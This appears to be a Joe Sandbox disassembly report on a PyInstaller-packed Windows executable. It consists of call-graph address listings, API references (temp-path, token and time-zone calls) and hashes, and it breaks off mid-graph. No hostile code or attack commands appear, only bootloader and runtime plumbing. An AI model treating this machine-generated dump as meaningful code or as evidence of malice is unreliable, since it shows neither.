17361->17358 17362->16655 17364 7ff6d6e98d50 17363->17364 17365 7ff6d6e98d3d FindClose 17363->17365 17366 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17364->17366 17365->17364 17367 7ff6d6e9411c 17366->17367 17367->17351 17369 7ff6d6e97dee 17368->17369 17370 7ff6d6eab1d3 17368->17370 17369->16676 17370->17369 17371 7ff6d6eab25c __std_exception_copy 37 API calls 17370->17371 17372 7ff6d6eab200 17371->17372 17372->17369 17373 7ff6d6eab6b8 _wfindfirst32i64 17 API calls 17372->17373 17374 7ff6d6eab230 17373->17374 
17376 7ff6d6e94060 116 API calls 17375->17376 17377 7ff6d6e91ac6 17376->17377 17378 7ff6d6e984c0 83 API calls 17377->17378 17385 7ff6d6e91c74 17377->17385 17381 7ff6d6e91afe 17378->17381 17379 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17380 7ff6d6e91c88 17379->17380 17380->16695 17408 7ff6d6e93e80 17380->17408 17407 7ff6d6e91b2f 17381->17407 17414 7ff6d6ea1004 17381->17414 17383 7ff6d6ea097c 74 API calls 17383->17385 17384 7ff6d6e91b18 17386 7ff6d6e91b34 17384->17386 17387 7ff6d6e91b1c 17384->17387 17385->17379 17418 7ff6d6ea0ccc 17386->17418 17388 7ff6d6e92870 59 API calls 17387->17388 17388->17407 17391 7ff6d6e91b4f 17393 7ff6d6e92870 59 API calls 17391->17393 17392 7ff6d6e91b67 17394 7ff6d6ea1004 73 API calls 17392->17394 17393->17407 17395 7ff6d6e91bb4 17394->17395 17396 7ff6d6e91bde 17395->17396 17397 7ff6d6e91bc6 17395->17397 17399 7ff6d6ea0ccc _fread_nolock 53 API calls 17396->17399 17398 7ff6d6e92870 59 API calls 17397->17398 17398->17407 17400 7ff6d6e91bf3 17399->17400 17401 7ff6d6e91c0e 17400->17401 17402 7ff6d6e91bf9 17400->17402 17421 7ff6d6ea0a40 17401->17421 17404 7ff6d6e92870 59 API calls 17402->17404 17404->17407 17406 7ff6d6e92b10 59 API calls 17406->17407 17407->17383 17409 7ff6d6e91ee0 49 API calls 17408->17409 17410 7ff6d6e93e9d 17409->17410 17410->16696 17412 7ff6d6e91ee0 49 API calls 17411->17412 17413 7ff6d6e94170 17412->17413 17413->16695 17415 7ff6d6ea1034 17414->17415 17427 7ff6d6ea0d94 17415->17427 17417 7ff6d6ea104d 17417->17384 17439 7ff6d6ea0cec 17418->17439 17422 7ff6d6ea0a49 17421->17422 17423 7ff6d6e91c22 17421->17423 17424 7ff6d6ea5cb4 _set_fmode 11 API calls 17422->17424 17423->17406 17423->17407 17425 7ff6d6ea0a4e 17424->17425 17428 7ff6d6ea0dfe 17427->17428 17429 7ff6d6ea0dbe 17427->17429 17428->17429 17430 7ff6d6ea0e0a 17428->17430 17431 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17429->17431 17438 7ff6d6ea5b5c EnterCriticalSection 17430->17438 17433 7ff6d6ea0de5 17431->17433 17433->17417 17440 7ff6d6ea0d16 
17439->17440 17441 7ff6d6e91b49 17439->17441 17440->17441 17442 7ff6d6ea0d62 17440->17442 17443 7ff6d6ea0d25 __scrt_get_show_window_mode 17440->17443 17441->17391 17441->17392 17452 7ff6d6ea5b5c EnterCriticalSection 17442->17452 17445 7ff6d6ea5cb4 _set_fmode 11 API calls 17443->17445 17447 7ff6d6ea0d3a 17445->17447 17449 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17447->17449 17449->17441 17454 7ff6d6e9889f GetTokenInformation 17453->17454 17455 7ff6d6e98921 __std_exception_copy 17453->17455 17456 7ff6d6e988c0 GetLastError 17454->17456 17457 7ff6d6e988cb 17454->17457 17458 7ff6d6e98934 CloseHandle 17455->17458 17459 7ff6d6e9893a 17455->17459 17456->17455 17456->17457 17457->17455 17460 7ff6d6e988e7 GetTokenInformation 17457->17460 17458->17459 17459->16705 17460->17455 17461 7ff6d6e9890a 17460->17461 17461->17455 17462 7ff6d6e98914 ConvertSidToStringSidW 17461->17462 17462->17455 17464 7ff6d6e98975 17463->17464 17480 7ff6d6ea5508 17464->17480 17468 7ff6d6e92c50 17467->17468 17469 7ff6d6ea52b4 49 API calls 17468->17469 17470 7ff6d6e92c9b __scrt_get_show_window_mode 17469->17470 17471 7ff6d6e98de0 57 API calls 17470->17471 17472 7ff6d6e92cd0 17471->17472 17473 7ff6d6e92cd5 17472->17473 17474 7ff6d6e92d0d MessageBoxA 17472->17474 17476 7ff6d6e98de0 57 API calls 17473->17476 17475 7ff6d6e92d27 17474->17475 17477 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17475->17477 17478 7ff6d6e92cef MessageBoxW 17476->17478 17479 7ff6d6e92d37 17477->17479 17478->17475 17479->16715 17482 7ff6d6ea5562 17480->17482 17481 7ff6d6ea5587 17483 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17481->17483 17482->17481 17484 7ff6d6ea55c3 17482->17484 17486 7ff6d6ea55b1 17483->17486 17498 7ff6d6ea38c0 17484->17498 17488 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17486->17488 17490 7ff6d6e98998 17488->17490 17489 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17489->17486 17490->16712 17491 7ff6d6ea56a4 17491->17489 17492 7ff6d6ea5679 17496 7ff6d6eab700 
Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17492->17496 17493 7ff6d6ea5670 17493->17491 17493->17492 17494 7ff6d6ea56ca 17494->17491 17495 7ff6d6ea56d4 17494->17495 17497 7ff6d6eab700 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17495->17497 17496->17486 17497->17486 17499 7ff6d6ea38fe 17498->17499 17500 7ff6d6ea38ee 17498->17500 17501 7ff6d6ea3907 17499->17501 17506 7ff6d6ea3935 17499->17506 17502 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17500->17502 17503 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17501->17503 17504 7ff6d6ea392d 17502->17504 17503->17504 17504->17491 17504->17492 17504->17493 17504->17494 17506->17500 17506->17504 17509 7ff6d6ea42d4 17506->17509 17542 7ff6d6ea3d20 17506->17542 17579 7ff6d6ea34b0 17506->17579 17510 7ff6d6ea4387 17509->17510 17511 7ff6d6ea4316 17509->17511 17514 7ff6d6ea43e0 17510->17514 17515 7ff6d6ea438c 17510->17515 17512 7ff6d6ea43b1 17511->17512 17513 7ff6d6ea431c 17511->17513 17598 7ff6d6ea2684 17512->17598 17516 7ff6d6ea4321 17513->17516 17517 7ff6d6ea4350 17513->17517 17521 7ff6d6ea43f7 17514->17521 17523 7ff6d6ea43ea 17514->17523 17524 7ff6d6ea43ef 17514->17524 17518 7ff6d6ea438e 17515->17518 17519 7ff6d6ea43c1 17515->17519 17516->17521 17522 7ff6d6ea4327 17516->17522 17517->17522 17517->17524 17530 7ff6d6ea439d 17518->17530 17532 7ff6d6ea4330 17518->17532 17605 7ff6d6ea2274 17519->17605 17612 7ff6d6ea4fdc 17521->17612 17528 7ff6d6ea4362 17522->17528 17522->17532 17537 7ff6d6ea434b 17522->17537 17523->17512 17523->17524 17540 7ff6d6ea4420 17524->17540 17616 7ff6d6ea2a94 17524->17616 17528->17540 17592 7ff6d6ea4dc4 17528->17592 17530->17512 17533 7ff6d6ea43a2 17530->17533 17532->17540 17582 7ff6d6ea4a88 17532->17582 17535 7ff6d6ea4e88 37 API calls 17533->17535 17533->17540 17534 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17536 7ff6d6ea471a 17534->17536 17535->17537 17536->17506 17538 7ff6d6ea50f0 45 API calls 17537->17538 17537->17540 17541 7ff6d6ea460c 17537->17541 
17538->17541 17540->17534 17541->17540 17623 7ff6d6eaf7b8 17541->17623 17543 7ff6d6ea3d2e 17542->17543 17544 7ff6d6ea3d44 17542->17544 17545 7ff6d6ea3d84 17543->17545 17546 7ff6d6ea4387 17543->17546 17547 7ff6d6ea4316 17543->17547 17544->17545 17548 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17544->17548 17545->17506 17551 7ff6d6ea43e0 17546->17551 17552 7ff6d6ea438c 17546->17552 17549 7ff6d6ea43b1 17547->17549 17550 7ff6d6ea431c 17547->17550 17548->17545 17557 7ff6d6ea2684 38 API calls 17549->17557 17553 7ff6d6ea4321 17550->17553 17554 7ff6d6ea4350 17550->17554 17558 7ff6d6ea43f7 17551->17558 17561 7ff6d6ea43ea 17551->17561 17564 7ff6d6ea43ef 17551->17564 17555 7ff6d6ea438e 17552->17555 17556 7ff6d6ea43c1 17552->17556 17553->17558 17559 7ff6d6ea4327 17553->17559 17554->17559 17554->17564 17560 7ff6d6ea4330 17555->17560 17568 7ff6d6ea439d 17555->17568 17562 7ff6d6ea2274 38 API calls 17556->17562 17574 7ff6d6ea434b 17557->17574 17565 7ff6d6ea4fdc 45 API calls 17558->17565 17559->17560 17566 7ff6d6ea4362 17559->17566 17559->17574 17563 7ff6d6ea4a88 47 API calls 17560->17563 17577 7ff6d6ea4420 17560->17577 17561->17549 17561->17564 17562->17574 17563->17574 17567 7ff6d6ea2a94 38 API calls 17564->17567 17564->17577 17565->17574 17570 7ff6d6ea4dc4 46 API calls 17566->17570 17566->17577 17567->17574 17568->17549 17569 7ff6d6ea43a2 17568->17569 17572 7ff6d6ea4e88 37 API calls 17569->17572 17569->17577 17570->17574 17571 7ff6d6e9c010 _wfindfirst32i64 8 API calls 17573 7ff6d6ea471a 17571->17573 17572->17574 17573->17506 17575 7ff6d6ea50f0 45 API calls 17574->17575 17574->17577 17578 7ff6d6ea460c 17574->17578 17575->17578 17576 7ff6d6eaf7b8 46 API calls 17576->17578 17577->17571 17578->17576 17578->17577 17657 7ff6d6ea18f8 17579->17657 17583 7ff6d6ea4aae 17582->17583 17584 7ff6d6ea14b0 12 API calls 17583->17584 17585 7ff6d6ea4afe 17584->17585 17593 7ff6d6ea4df9 17592->17593 17594 7ff6d6ea4e17 17593->17594 17595 7ff6d6ea50f0 45 API calls 17593->17595 17597 
7ff6d6ea4e3e 17593->17597 17595->17594 17597->17537 17599 7ff6d6ea26b7 17598->17599 17600 7ff6d6ea26e6 17599->17600 17602 7ff6d6ea27a3 17599->17602 17604 7ff6d6ea2723 17600->17604 17635 7ff6d6ea1558 17600->17635 17603 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17602->17603 17603->17604 17604->17537 17606 7ff6d6ea22a7 17605->17606 17607 7ff6d6ea22d6 17606->17607 17609 7ff6d6ea2393 17606->17609 17608 7ff6d6ea1558 12 API calls 17607->17608 17611 7ff6d6ea2313 17607->17611 17608->17611 17610 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17609->17610 17610->17611 17611->17537 17613 7ff6d6ea501f 17612->17613 17614 7ff6d6ea5023 __crtLCMapStringW 17613->17614 17643 7ff6d6ea5078 17613->17643 17614->17537 17617 7ff6d6ea2ac7 17616->17617 17618 7ff6d6ea2af6 17617->17618 17620 7ff6d6ea2bb3 17617->17620 17619 7ff6d6ea1558 12 API calls 17618->17619 17621 7ff6d6ea2b33 17618->17621 17619->17621 17622 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17620->17622 17621->17537 17622->17621 17624 7ff6d6eaf7e9 17623->17624 17632 7ff6d6eaf7f7 17623->17632 17624->17632 17632->17541 17636 7ff6d6ea158f 17635->17636 17642 7ff6d6ea157e 17635->17642 17637 7ff6d6eae3ac _fread_nolock 12 API calls 17636->17637 17636->17642 17642->17604 17644 7ff6d6ea509e 17643->17644 17645 7ff6d6ea5096 17643->17645 17644->17614 17646 7ff6d6ea50f0 45 API calls 17645->17646 17646->17644 17658 7ff6d6ea193f 17657->17658 17659 7ff6d6ea192d 17657->17659 17661 7ff6d6ea194d 17658->17661 17666 7ff6d6ea1989 17658->17666 17660 7ff6d6ea5cb4 _set_fmode 11 API calls 17659->17660 17662 7ff6d6ea1932 17660->17662 17663 7ff6d6eab5cc _invalid_parameter_noinfo 37 API calls 17661->17663 17664 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17662->17664 17671 7ff6d6ea193d 17663->17671 17664->17671 17665 7ff6d6ea1d05 17667 7ff6d6ea5cb4 _set_fmode 11 API calls 17665->17667 17665->17671 17666->17665 17668 7ff6d6ea5cb4 _set_fmode 11 API calls 17666->17668 17669 7ff6d6ea1f99 17667->17669 17670 7ff6d6ea1cfa 17668->17670 
17672 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17669->17672 17673 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 17670->17673 17671->17506 17672->17671 17673->17665 17675 7ff6d6e97b76 17674->17675 17676 7ff6d6e97b9a 17675->17676 17677 7ff6d6e97bed GetTempPathW 17675->17677 17679 7ff6d6e97d70 61 API calls 17676->17679 17678 7ff6d6e97c02 17677->17678 17713 7ff6d6e92810 17678->17713 17680 7ff6d6e97ba6 17679->17680 17725 7ff6d6e97630 17680->17725 17691 7ff6d6e97c1b __std_exception_copy 17692 7ff6d6e97cc6 17691->17692 17696 7ff6d6e97c51 17691->17696 17717 7ff6d6ea92c8 17691->17717 17720 7ff6d6e98d80 17691->17720 17714 7ff6d6e92835 17713->17714 17715 7ff6d6ea5508 48 API calls 17714->17715 17716 7ff6d6e92854 17715->17716 17716->17691 17726 7ff6d6e9763c 17725->17726 17727 7ff6d6e98de0 57 API calls 17726->17727 17728 7ff6d6e9765e 17727->17728 17729 7ff6d6e97666 17728->17729 17730 7ff6d6e97679 ExpandEnvironmentStringsW 17728->17730 17732 7ff6d6e92b10 59 API calls 17729->17732 17731 7ff6d6e9769f __std_exception_copy 17730->17731 17998 7ff6d6e9172e 17997->17998 17999 7ff6d6e91716 17997->17999 18001 7ff6d6e91734 17998->18001 18002 7ff6d6e91758 17998->18002 18000 7ff6d6e92b10 59 API calls 17999->18000 18003 7ff6d6e91722 18000->18003 18127 7ff6d6e912a0 18001->18127 18090 7ff6d6e97e20 18002->18090 18003->16748 18008 7ff6d6e9174f 18008->16748 18009 7ff6d6e917a9 18011 7ff6d6e94060 116 API calls 18009->18011 18010 7ff6d6e9177d 18013 7ff6d6e92870 59 API calls 18010->18013 18014 7ff6d6e917be 18011->18014 18012 7ff6d6e92b10 59 API calls 18012->18008 18015 7ff6d6e91793 18013->18015 18016 7ff6d6e917de 18014->18016 18017 7ff6d6e917c6 18014->18017 18015->16748 18019 7ff6d6ea1004 73 API calls 18016->18019 18018 7ff6d6e92b10 59 API calls 18017->18018 18020 7ff6d6e917d5 18018->18020 18021 7ff6d6e917ef 18019->18021 18040 7ff6d6e92d66 18039->18040 18041 7ff6d6e91ee0 49 API calls 18040->18041 18043 7ff6d6e92d99 18041->18043 18042 7ff6d6e930ca 18043->18042 18044 7ff6d6e93e80 49 API 
calls 18043->18044 18045 7ff6d6e92e07 18044->18045 18046 7ff6d6e93e80 49 API calls 18045->18046 18047 7ff6d6e92e18 18046->18047 18048 7ff6d6e92e75 18047->18048 18049 7ff6d6e92e39 18047->18049 18051 7ff6d6e93190 75 API calls 18048->18051 18249 7ff6d6e93190 18049->18249 18052 7ff6d6e92e73 18051->18052 18053 7ff6d6e92eb4 18052->18053 18054 7ff6d6e92ef6 18052->18054 18257 7ff6d6e977b0 18053->18257 18055 7ff6d6e93190 75 API calls 18054->18055 18057 7ff6d6e92f20 18055->18057 18062 7ff6d6e93190 75 API calls 18057->18062 18067 7ff6d6e92fbc 18057->18067 18064 7ff6d6e92f52 18062->18064 18064->18067 18069 7ff6d6e93190 75 API calls 18064->18069 18065 7ff6d6e91ea0 59 API calls 18068 7ff6d6e9300f 18065->18068 18067->18065 18083 7ff6d6e930cf 18067->18083 18068->18042 18091 7ff6d6e97e30 18090->18091 18092 7ff6d6e91ee0 49 API calls 18091->18092 18093 7ff6d6e97e71 18092->18093 18107 7ff6d6e97ef1 18093->18107 18170 7ff6d6e93ff0 18093->18170 18095 7ff6d6e9c010 _wfindfirst32i64 8 API calls 18097 7ff6d6e91775 18095->18097 18097->18009 18097->18010 18098 7ff6d6e97f2b 18176 7ff6d6e979d0 18098->18176 18100 7ff6d6e97ee0 18103 7ff6d6e92c30 59 API calls 18100->18103 18101 7ff6d6e97d70 61 API calls 18108 7ff6d6e97ea2 __std_exception_copy 18101->18108 18103->18107 18104 7ff6d6e92c30 59 API calls 18104->18098 18106 7ff6d6e97f14 18106->18104 18107->18095 18108->18100 18108->18106 18128 7ff6d6e912b2 18127->18128 18129 7ff6d6e94060 116 API calls 18128->18129 18130 7ff6d6e912e2 18129->18130 18131 7ff6d6e91301 18130->18131 18132 7ff6d6e912ea 18130->18132 18134 7ff6d6ea1004 73 API calls 18131->18134 18133 7ff6d6e92b10 59 API calls 18132->18133 18162 7ff6d6e912fa __std_exception_copy 18133->18162 18135 7ff6d6e91313 18134->18135 18136 7ff6d6e91317 18135->18136 18137 7ff6d6e9133d 18135->18137 18138 7ff6d6e92870 59 API calls 18136->18138 18142 7ff6d6e91380 18137->18142 18143 7ff6d6e91358 18137->18143 18139 7ff6d6e9132e 18138->18139 18141 7ff6d6ea097c 74 API calls 18139->18141 18140 7ff6d6e9c010 
_wfindfirst32i64 8 API calls 18146 7ff6d6e91444 18140->18146 18141->18162 18145 7ff6d6e9139a 18142->18145 18157 7ff6d6e91453 18142->18157 18144 7ff6d6e92870 59 API calls 18143->18144 18147 7ff6d6e91373 18144->18147 18148 7ff6d6e91050 98 API calls 18145->18148 18146->18008 18146->18012 18150 7ff6d6ea097c 74 API calls 18147->18150 18151 7ff6d6e913ab 18148->18151 18149 7ff6d6e913b3 18152 7ff6d6ea097c 74 API calls 18149->18152 18150->18162 18151->18149 18153 7ff6d6e914c2 __std_exception_copy 18151->18153 18154 7ff6d6e913bf 18152->18154 18155 7ff6d6ea0ccc _fread_nolock 53 API calls 18155->18157 18157->18149 18157->18155 18159 7ff6d6e914ab 18157->18159 18160 7ff6d6e92870 59 API calls 18159->18160 18160->18153 18162->18140 18171 7ff6d6e93ffa 18170->18171 18172 7ff6d6e98de0 57 API calls 18171->18172 18173 7ff6d6e94022 18172->18173 18174 7ff6d6e9c010 _wfindfirst32i64 8 API calls 18173->18174 18175 7ff6d6e9404a 18174->18175 18175->18098 18175->18101 18175->18108 18177 7ff6d6e979e0 18176->18177 18178 7ff6d6e91ee0 49 API calls 18177->18178 18250 7ff6d6e931c4 18249->18250 18251 7ff6d6ea52b4 49 API calls 18250->18251 18252 7ff6d6e931ea 18251->18252 18253 7ff6d6e931fb 18252->18253 18309 7ff6d6ea65dc 18252->18309 18255 7ff6d6e9c010 _wfindfirst32i64 8 API calls 18253->18255 18256 7ff6d6e93219 18255->18256 18256->18052 18258 7ff6d6e977be 18257->18258 18259 7ff6d6e94060 116 API calls 18258->18259 18260 7ff6d6e977ed 18259->18260 18261 7ff6d6e91ee0 49 API calls 18260->18261 18310 7ff6d6ea6605 18309->18310 18311 7ff6d6ea65f9 18309->18311 18351 7ff6d6ea5788 18310->18351 18326 7ff6d6ea5ef0 18311->18326 18327 7ff6d6ea5f27 18326->18327 18328 7ff6d6ea5f0a 18326->18328 18327->18328 18568 7ff6d6ea6918 18567->18568 18569 7ff6d6ea693e 18568->18569 18572 7ff6d6ea6971 18568->18572 18570 7ff6d6ea5cb4 _set_fmode 11 API calls 18569->18570 18571 7ff6d6ea6943 18570->18571 18573 7ff6d6eab698 _invalid_parameter_noinfo 37 API calls 18571->18573 18574 7ff6d6ea6984 18572->18574 18575 7ff6d6ea6977 

Control-flow Graph

APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Message$EnvironmentPost$DirectoryExpandFileModuleNameStringsVariable
• String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
• API String ID: 2647325126-1544818733
• Opcode ID: c24b068d907f4d3a9411edbdac7868b91bda648b49eb6d755cb9cb2029497688
• Instruction ID: fb72ec2e62fd3e51265509b4057bf3564d27dc46955d8f0f6da667a3b5fad83d
• Opcode Fuzzy Hash: c24b068d907f4d3a9411edbdac7868b91bda648b49eb6d755cb9cb2029497688
• Instruction Fuzzy Hash: E0C16F61F0CA4691FE24EB2595512BE63A1BF8478CF444133EA4DC769BEF2EE925C700

Control-flow Graph

APIs
• _get_daylight.LIBCMT ref: 00007FF6D6EB6B95
  • Part of subcall function 00007FF6D6EB64E8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB64FC
  • Part of subcall function 00007FF6D6EAB700: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB716
  • Part of subcall function 00007FF6D6EAB700: GetLastError.KERNEL32(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB720
  • Part of subcall function 00007FF6D6EAB6B8: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF6D6EAB697,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAB6C1
  • Part of subcall function 00007FF6D6EAB6B8: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF6D6EAB697,?,?,?,?,?,00007FF6D6EA38BC), ref: 00007FF6D6EAB6E6
• _get_daylight.LIBCMT ref: 00007FF6D6EB6B84
  • Part of subcall function 00007FF6D6EB6548: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EB655C
• _get_daylight.LIBCMT ref: 00007FF6D6EB6DFA
• _get_daylight.LIBCMT ref: 00007FF6D6EB6E0B
• _get_daylight.LIBCMT ref: 00007FF6D6EB6E1C
• GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6D6EB705C), ref: 00007FF6D6EB6E43
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureInformationLanguagesLastPreferredPresentProcessProcessorRestoreThreadTimeZone
• String ID: W. Europe Standard Time$W. Europe Summer Time
• API String ID: 1458651798-690618308
• Opcode ID: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
• Instruction ID: e849a53e16de95562038c68f6dbbf4888240c7bf522c5c5a402cae3408671e4c
• Opcode Fuzzy Hash: 011d4974f3e124412289dc327b2b40947a146d65b03f6d5f747eb19bebd0a963
• Instruction Fuzzy Hash: 58D1BD26E1C3128AEB24EF2AD8505BD7761FF84B84F444137EA4D87A95DE3EE4618B40

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
• String ID:
• API String ID: 1617910340-0
• Opcode ID: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
• Instruction ID: 286e87da1147fecf4430cb9469f9f440caf7687606c944a9bc66a5a941c53700
• Opcode Fuzzy Hash: 8482aad9305a30c551bfc572177b6762c68ebfb4afe3bdfce811c5be068ed5ba
• Instruction Fuzzy Hash: DFC1B036F2CB5685EB10CF68C4906BC3771EB49B98B01123ADA1E9B794DF39D465C740

Control-flow Graph

APIs
• GetTempPathW.KERNEL32(00000000,?,00000000,00000000,?,00007FF6D6E9153F), ref: 00007FF6D6E97BF7
  • Part of subcall function 00007FF6D6E97D70: GetEnvironmentVariableW.KERNEL32(00007FF6D6E939FF), ref: 00007FF6D6E97DAA
  • Part of subcall function 00007FF6D6E97D70: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF6D6E97DC7
  • Part of subcall function 00007FF6D6EA8610: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6D6EA8629
• SetEnvironmentVariableW.KERNEL32 ref: 00007FF6D6E97CB1
  • Part of subcall function 00007FF6D6E92B10: MessageBoxW.USER32 ref: 00007FF6D6E92BE5
Strings
Memory Dump Source
• Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
• Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
• Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
Similarity
• API ID: Environment$Variable$ExpandMessagePathStringsTemp_invalid_parameter_noinfo
• String ID: LOADER: Failed to set the TMP environment variable.$TMP$TMP$_MEI%d
• API String ID: 3752271684-1116378104
• Opcode ID: c156423b33866011d019db228dcac7379af2ead993036b2191ec76f2d14005c3
• Instruction ID: a2451216a3412181eddae18d3d37eefbe0d85e24352e1036ce057b5df7ac8e70
• Opcode Fuzzy Hash: c156423b33866011d019db228dcac7379af2ead993036b2191ec76f2d14005c3
• Instruction Fuzzy Hash: 3951D311F1D25341FE14AB26A9156BE62916F89FC4F484433ED0ECBBD7ED2EE4258740

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 935 7ff6d6eb6dcc-7ff6d6eb6e01 call 7ff6d6eb64d8 call 7ff6d6eb64e0 call 7ff6d6eb6548 942 7ff6d6eb6f3f-7ff6d6eb6fad call 7ff6d6eab6b8 call 7ff6d6eb23d0 935->942 943 7ff6d6eb6e07-7ff6d6eb6e12 call 7ff6d6eb64e8 935->943 955 7ff6d6eb6faf-7ff6d6eb6fb6 942->955 956 7ff6d6eb6fbb-7ff6d6eb6fbe 942->956 943->942 948 7ff6d6eb6e18-7ff6d6eb6e23 call 7ff6d6eb6518 943->948 948->942 954 7ff6d6eb6e29-7ff6d6eb6e4c call 7ff6d6eab700 GetTimeZoneInformation 948->954 968 7ff6d6eb6f14-7ff6d6eb6f3e call 7ff6d6eb64d0 call 7ff6d6eb64c0 call 7ff6d6eb64c8 954->968 969 7ff6d6eb6e52-7ff6d6eb6e73 954->969 957 7ff6d6eb704b-7ff6d6eb704e 955->957 958 7ff6d6eb6fc0 956->958 959 7ff6d6eb6ff5-7ff6d6eb7008 call 7ff6d6eae3ac 956->959 961 7ff6d6eb6fc3 call 7ff6d6eb6dcc 957->961 962 7ff6d6eb7054-7ff6d6eb705c call 7ff6d6eb6b50 957->962 958->961 975 7ff6d6eb7013-7ff6d6eb702e call 7ff6d6eb23d0 959->975 976 7ff6d6eb700a 959->976 973 7ff6d6eb6fc8-7ff6d6eb6ff4 call 7ff6d6eab700 call 7ff6d6e9c010 961->973 962->973 970 7ff6d6eb6e7e-7ff6d6eb6e85 969->970 971 7ff6d6eb6e75-7ff6d6eb6e7b 969->971 978 7ff6d6eb6e99 970->978 979 7ff6d6eb6e87-7ff6d6eb6e8f 970->979 971->970 989 7ff6d6eb7030-7ff6d6eb7033 975->989 990 7ff6d6eb7035-7ff6d6eb7047 call 7ff6d6eab700 975->990 982 7ff6d6eb700c-7ff6d6eb7011 call 7ff6d6eab700 976->982 987 